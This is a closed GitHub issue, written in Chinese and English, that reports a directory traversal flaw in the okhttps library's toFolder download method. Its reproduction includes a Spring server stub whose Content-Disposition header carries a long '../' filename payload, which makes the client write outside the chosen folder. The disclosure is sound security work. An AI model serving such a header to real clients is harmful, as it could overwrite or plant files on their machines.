Skip to content

使用toFolder方法下载文件时可能出现目录穿越漏洞 #89

New issue
New issue
Closed
Closed
使用toFolder方法下载文件时可能出现目录穿越漏洞#89
Labels
bugSomething isn't working
@arandomusernone

Description

@arandomusernone
arandomusernone
opened on Jan 30, 2024

问题描述

使用toFolder方法下载文件到某个目录时,根据服务端返回的Content-Disposition 获取文件名会出现目录穿越漏洞。如果服务端返回的filename包含../`,文件就会被保存到其他路径下。

When using the toFolder method to download file to a certain directory, a directory traversal vulnerability will occur when obtaining the file name based on the Content-Disposition returned by the server. If the filename returned by the server contains ../`, directory traversal will occur.

复现过程

Client:

HTTP exp = HTTP.builder()
      .baseUrl("http://127.0.0.1:8080")
      .build();
exp.sync("/a.zip")
      .get().getBody()
      .toFolder("/Users/e4stjun/Desktop/test")
      .start();

Server:

@RestController
public class ExpController {
    @RequestMapping("/a.zip")
    public String a(HttpServletResponse response)
    {
        response.setHeader("Content-Disposition","attachment;filename=../../../../../../../../../../../../../../../../../../../../../../tmp/success");
        return "success";
    }
}

使用的版本

  • okhttps 4.0.2
  • JDK20

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions